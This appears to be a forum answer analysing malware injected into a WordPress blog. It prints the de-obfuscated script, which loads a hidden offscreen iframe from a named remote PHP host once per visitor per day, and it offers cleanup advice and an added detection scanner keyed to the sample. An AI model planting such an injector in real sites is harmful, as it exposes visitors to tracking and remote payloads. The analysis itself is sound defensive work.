This is pure info. Your malware looks like this when it's de-obfuscated:
    // Builds an iframe that loads the remote PHP script and attaches it to the page.
    function k09() {
        var static = 'ajax';           // never used
        var controller = 'index.php';  // never used
        var k = document.createElement('iframe');
        k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
        // Absolute positioning with very large left/top values.
        k.style.position = 'absolute';
        k.style.color = '512';
        k.style.height = '512px';
        k.style.width = '512px';
        k.style.left = '1000512';
        k.style.top = '1000512';
        if (!document.getElementById('k')) {
            document.write('<p id=\'k\' class=\'k09\' ></p>');
            document.getElementById('k').appendChild(k);
        }
    }

    // Stores a cookie that expires after nDays days (defaults to 1).
    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }

    // Returns the value of the named cookie, or null if it is not set.
    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length))) {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }

    // Runs k09() once per visitor per day: skipped while the visited_uq cookie is 55.
    if (navigator.cookieEnabled) {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
            k09();
        }
    }
http://dostojewskij-gesellschaft.de/VD49Jdzr.php simply outputs "OK".
Why?
My guess is that this is an IP/traffic logger. Maybe for the hackers to check which blogs are most active and then later come back and hack that particular site (no need to waste time on a site with 2 visitors a month). This is good and bad.
The good part is that it seems that they haven't used any of your user database or anything else.
The bad part is that they might very well have downloaded your entire database since they've obviously had executing rights on your server, and might've placed their PHP files all over your server. Your best bet is to start on a fresh WP and copy plugins/themes in one-by-one while manually checking them.
Change all passwords. Even your DB login. Consider everything compromised.
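To support the manual check of copied plugins and themes suggested above, here is an added example (not part of the original answer) that scores file contents against the traits visible in the de-obfuscated script. The indicator names, weights, threshold and sample file paths are assumptions made for this sketch.

```javascript
// Added example: indicators and weights are assumptions taken from the
// de-obfuscated sample in this answer, not a complete signature set.
const INDICATORS = [
  { name: 'dynamic-iframe', weight: 2, re: /createElement\(\s*['"]iframe['"]\s*\)/i },
  { name: 'offscreen-position', weight: 2, re: /\.style\.(left|top)\s*=\s*['"]?-?\d{4,}/i },
  { name: 'document-write', weight: 1, re: /document\.write\s*\(/i },
  { name: 'visit-gate-cookie', weight: 3, re: /visited_uq/ },
  { name: 'known-host', weight: 3, re: /dostojewskij-gesellschaft\.de/i },
];

// Return the indicators found in one file's text and their summed weight.
function scanSource(text) {
  const hits = INDICATORS.filter((i) => i.re.test(text));
  return {
    hits: hits.map((i) => i.name),
    score: hits.reduce((sum, i) => sum + i.weight, 0),
  };
}

// files: { path: contents }, read by the caller from the plugin/theme copy.
// A single weak trait (e.g. a legitimate embed creating an iframe) stays
// below the threshold; a combination of traits is flagged for manual review.
function triage(files, threshold = 4) {
  return Object.entries(files)
    .map(([path, text]) => ({ path, ...scanSource(text) }))
    .filter((r) => r.score >= threshold)
    .sort((a, b) => b.score - a.score);
}

// Constructed sample input (hypothetical paths and contents).
const SAMPLE_FILES = {
  'themes/example/footer.php':
    "<script>var k = document.createElement('iframe');\n" +
    "k.style.left = '1000512';\n" +
    "if (GetCookie('visited_uq') == 55) {}</script>",
  'plugins/example/embed.js':
    "var f = document.createElement('iframe'); f.src = '/player'; box.appendChild(f);",
  'themes/example/style.css': 'body { margin: 0; }',
};

const REPORT = triage(SAMPLE_FILES);
console.log(REPORT);
```

These patterns match the script only in its de-obfuscated form, so a file that passes this check has still not been shown to be clean.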